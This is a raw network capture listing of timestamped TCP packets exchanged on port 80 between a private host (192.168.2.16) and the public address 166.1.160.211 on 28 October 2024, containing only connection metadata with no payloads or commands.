                                                                                                                                                              Oct 28, 2024 19:46:21.996831894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996866941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996882915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996901035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996934891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.996946096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.996968985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997001886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997015953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997036934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997070074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997102976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.997107983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.997149944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.310950994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.310973883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311001062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311017036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311021090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311034918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311049938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311063051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311068058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311109066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311499119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311515093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311530113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311538935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311542988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311554909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311570883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311574936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311587095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311599970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311604023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311620951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311631918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311639071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311655998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311671019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311675072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311688900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311698914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311707973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.311728001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.311981916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312024117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312053919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312071085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312151909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312238932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312257051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312273979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312290907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312299967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312326908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312391996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312417030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312433004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312448978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312459946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312465906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312483072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312490940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312500000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312515974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312520981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312532902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312566996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312825918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312840939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312859058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312871933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312901020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.312968016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.312984943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313000917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313018084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313025951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313056946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313237906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313255072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313271999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313288927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313297987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313307047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313323975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313333988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313345909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313363075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313379049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313406944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313589096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313606024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313643932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313728094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313744068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313786983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313858032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313874006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313890934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313908100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313915014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.313925028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.313949108 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314037085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314080954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314131021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314147949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314163923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314179897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314186096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314197063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314213991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314220905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314232111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314250946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314254999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314266920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314284086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314296007 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314321041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314585924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314651012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314677000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314699888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314771891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314800024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314824104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.314826965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314855099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.314876080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315052986 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315080881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315108061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315116882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.315135956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.315150976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.583131075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.621541977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627419949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627479076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627515078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627540112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627548933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627584934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627608061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627619982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627654076 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627669096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627686977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627738953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627741098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627773046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627805948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627827883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627840996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627873898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627887964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627908945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627943039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.627960920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.627979994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628022909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628096104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628129005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628173113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628201008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628274918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628309965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628326893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628350973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628386974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628400087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628438950 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628470898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628484011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628504992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628536940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628549099 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628571033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628604889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628618956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628638983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628674030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628690958 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628849983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628882885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628902912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628916025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628948927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.628963947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.628983021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629017115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629034042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.629050016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629082918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629113913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.629117012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629148960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629162073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.629184008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629230022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.629249096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629313946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629347086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.629359961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630395889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630429983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630448103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630481958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630516052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630532980 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630548954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630582094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630585909 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630614996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630666018 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630667925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630717993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630753040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630768061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630785942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630824089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630840063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630858898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630892038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630913019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.630932093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630965948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.630976915 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631000042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631031990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631055117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631067038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631100893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631134033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631161928 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631166935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631200075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631211042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631233931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631244898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631268978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631302118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631319046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631366968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631401062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631422043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631434917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631467104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631481886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631504059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631536961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631551027 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631571054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631606102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631608009 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631686926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631721020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.631733894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.631755114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848274946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848295927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848304033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848335981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848539114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848555088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848571062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848586082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848592043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848603964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848618984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848628044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848635912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848651886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848665953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848669052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848689079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848783970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848825932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848860979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848876953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848920107 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.848968029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.848984003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849000931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849015951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849029064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849056959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849245071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849261045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849277973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849294901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849302053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849312067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849328041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849339962 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849344015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849360943 CET8049726166.1.160.211192.168.2.16
